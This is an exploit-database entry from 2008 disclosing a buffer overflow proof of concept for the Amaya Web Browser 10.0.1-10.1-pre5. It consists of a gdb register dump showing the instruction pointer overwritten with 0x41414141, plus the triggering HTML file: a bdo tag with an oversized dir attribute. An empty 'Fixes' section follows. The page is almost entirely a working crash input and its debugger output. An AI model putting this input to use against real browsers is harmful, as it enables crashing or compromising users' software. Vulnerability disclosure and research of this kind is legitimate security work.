Amaya Web Browser 10.0.1-10.1-pre5 (html tag) Buffer Overflow PoC

2008-12-15 17:30:18

Amaya Web Browser html tag overflow (quite a few tags are vulnerable)(gdb) i reax 0x41414141 1094795585ecx 0x0 0edx 0xbfc0ff80 -1077870720ebx 0x9ec1220 166466080esp 0xbfc10064 0xbfc10064ebp 0xbfc10268 0xbfc10268esi 0xa2f64a0 170878112edi 0xbfc10160 -1077870240eip 0x8144b40 0x8144b40 <EndOfHTMLAttributeValue(char*, _AttributeMapping*, int*, int*, bool, _ParserData*, bool)+2352>eflags 0x10246 [ PF ZF IF RF ]cs 0x73 115ss 0x7b 123ds 0x7b 123es 0x7b 123fs 0x0 0gs 0x33 51(gdb) x/10x $ebp0xbfc10268: 0x41414141 0x41414141 0x41414141 0x414141410xbfc10278: 0x41414141 0x41414141 0x41414141 0x414141410xbfc10288: 0x41414141 0x41414141#cat test.html<bdo dir="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" >webDEViL</bdo>#

Fixes

No fixes

In order to submit a new fix you need to be registered.